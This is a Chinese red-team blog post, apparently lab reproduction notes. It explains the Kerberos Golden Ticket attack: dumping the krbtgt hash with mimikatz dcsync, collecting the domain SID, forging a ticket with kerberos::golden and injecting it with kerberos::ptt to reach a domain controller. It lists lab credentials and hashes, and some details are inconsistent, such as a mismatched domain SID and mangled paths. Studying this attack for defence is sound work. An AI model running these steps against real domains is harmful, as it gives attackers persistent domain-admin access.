黄金票据(Golden Ticket)攻击

admin 2020年11月30日16:38:19评论42 views字数 3671阅读12分14秒阅读模式

渗透攻击红队

一个专注于红队攻击的公众号

黄金票据(Golden Ticket)攻击


大家好,这里是 渗透攻击红队 的第 37 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更


黄金票据(Golden Ticket)攻击
黄金票据



在渗透测试过程中,攻击者往往会给自己留下多条进入内网的通道,如果我们忘记将 krbtgt 账号重置,攻击者就能快速重新拿到域控制器的权限。


假设域内存在一个 SID 为 502 的域账号 krbtgt 。krbtgt 是 KDC 服务使用的账号,属于 Domain Admins 组,在域环境中,每个用户账号票据都是由 krbtgt 生成的,如果攻击者拿到了 krbtgt 的 NTLM Hash 或者 AES-256 值,就可以伪造域内任意用户的身份,并以该用户的身份访问其他服务


在使用黄金票据(Golden Ticket)攻击时,需要以下信息:

  • 需要伪造的域管理员用户名(一般是域管账户)

  • 完整的域名

  • 域krbtgt  SID(就是域成员krbtgt SID去掉最后的)

  • krbtgt 的 NTLM Hash 或 AES-256 值



Golden Ticket

实验环境


域控制器:

  • IP:192.168.3.21

  • 域名:god.org

  • 用户名:administrator

  • 密码:Admin12345

域成员服务器:

  • IP:192.168.3.25

  • 域名:god.org

  • 用户名:mary

  • 密码:admin!@#45



黄金票据(Golden Ticket)攻击实践


1、导出 krbtgt 的 NTLM Hash

使用 mimikatz 导出 krbtgt 的 NTLM Hash:(使用域管权限)

黄金票据(Golden Ticket)攻击

得到的:

Hash NTLM: b097d7ed97495408e1537f706c357fc5aes256_hmac (4096) : 5a75bb9a4fc4453c66621a54af111884f45bbca6365bf4d81bc059f31e708827Object Security ID   : S-1-5-21-1218902331-2157346161-1782232778

该方法使用 mimikatz 工具的 dcsync 功能远程转储活动目录AD中的 ntds.dit。指定 /user 参数,可以只导出 krbtgt 账号信息。

2、获取基本信息

1、获取域 SID:

wmic useraccount get name,sid

黄金票据(Golden Ticket)攻击

得到的:

Name                  SIDAdministrator         S-1-5-21-1097424059-774219462-107513682-500Guest                 S-1-5-21-1097424059-774219462-107513682-501mary                  S-1-5-21-1097424059-774219462-107513682-1000Administrator         S-1-5-21-1218902331-2157346161-1782232778-500Guest                 S-1-5-21-1218902331-2157346161-1782232778-501krbtgt                S-1-5-21-1218902331-2157346161-1782232778-502SM_6ef9b5ce414946ae9  S-1-5-21-1218902331-2157346161-1782232778-1119SM_d80bb46e75164f258  S-1-5-21-1218902331-2157346161-1782232778-1120SM_d3853544b62a421fb  S-1-5-21-1218902331-2157346161-1782232778-1121SM_c330a5709f6a478b8  S-1-5-21-1218902331-2157346161-1782232778-1122mary                  S-1-5-21-1218902331-2157346161-1782232778-1124jenkins               S-1-5-21-1218902331-2157346161-1782232778-1126mack                  S-1-5-21-1218902331-2157346161-1782232778-1127hr                    S-1-5-21-1218902331-2157346161-1782232778-1128boss                  S-1-5-21-1218902331-2157346161-1782232778-1129dbadmin               S-1-5-21-1218902331-2157346161-1782232778-1130vpnadm                S-1-5-21-1218902331-2157346161-1782232778-1131webadmin              S-1-5-21-1218902331-2157346161-1782232778-1132fileadmin             S-1-5-21-1218902331-2157346161-1782232778-1135fedora                S-1-5-21-1218902331-2157346161-1782232778-1139kali                  S-1-5-21-1218902331-2157346161-1782232778-1140debian                S-1-5-21-1218902331-2157346161-1782232778-1141itadmin               S-1-5-21-1218902331-2157346161-1782232778-1142devadmain             S-1-5-21-1218902331-2157346161-1782232778-1143logers                S-1-5-21-1218902331-2157346161-1782232778-1144logtest               S-1-5-21-1218902331-2157346161-1782232778-1145klion                 S-1-5-21-1218902331-2157346161-1782232778-1146klionsec              S-1-5-21-1218902331-2157346161-1782232778-1147

采用这种方法,可以以普通域用户权限获取域内大部分用户的 SID,可以看到域 god.org 的域 SID 为:S-1-5-21-95064677-3481858386-3840636109。

2、获取当前用户的 SID:

whoami /user

黄金票据(Golden Ticket)攻击

得到的:

USER INFORMATION----------------
User Name SID========= ==============================================godmary S-1-5-21-1218902331-2157346161-1782232778-1124

3、查询域管理员账号:

net group "domain admins" /domain


黄金票据(Golden Ticket)攻击

得到的域管用户名是:Administrator。

4、查询域名:

ipconfig /all

黄金票据(Golden Ticket)攻击

得到的域名为:god.org。

3、实验操作

首先我们是无法查看到域控的共享信息的:

dir \OWA2010CN-Godc$

黄金票据(Golden Ticket)攻击

1、清空内存

使用 mimikatz 清空当前主机会话中的票据:

kerberos::purge

黄金票据(Golden Ticket)攻击

2、生成票据

使用 mimikatz 生成包含 krbtgt 身份的票据:(在域管下执行)

kerberos::golden /user:administrator /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:Administrator.kiribi

黄金票据(Golden Ticket)攻击


这个时候会在当前目录下生成一个名为:Administrator.kiribi 的文件!

3、传递票据并注入内存

将 Administrator.kiribi 票据放到域成员 mary 机器上然后注入内存:(使用 mary 运行)

kerberos::ptt Administrator.kiribi

黄金票据(Golden Ticket)攻击

4、检索当前会话中的票据

查看注入的票据:

kerberos::tgt

黄金票据(Golden Ticket)攻击

可以看到当前的票据已经在内存会话中了。

4、验证权限

我们已经把票据注入到内存了,这个时候我们就可以看看是否获取到了域控的权限:

dir \OWA2010CN-Godc$

黄金票据(Golden Ticket)攻击

如果想要清除内存中的票据可以使用:

kerberos::purge


结尾


使用黄金票据伪造的用户可以是任意用户(即使这个用户不存在),因为 TGT 的加密是由 krbtgt 完成的,所以只要 TGT 被 krbtgt 账户和密码正确的加密,那么任意 KDC 使用 krbtgt 将 TGT 解密后,TGT 中的所有信息都是可信的。



参考文章:

https://www.jianshu.com/p/4936da524040

https://blog.csdn.net/shuteer_xu/article/details/107031951


黄金票据(Golden Ticket)攻击

渗透攻击红队

一个专注于渗透红队攻击的公众号

黄金票据(Golden Ticket)攻击



黄金票据(Golden Ticket)攻击
点分享
黄金票据(Golden Ticket)攻击
点点赞
黄金票据(Golden Ticket)攻击
点在看

本文始发于微信公众号(渗透攻击红队):黄金票据(Golden Ticket)攻击

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年11月30日16:38:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   黄金票据(Golden Ticket)攻击http://cn-sec.com/archives/193154.html

发表评论

匿名网友 填写信息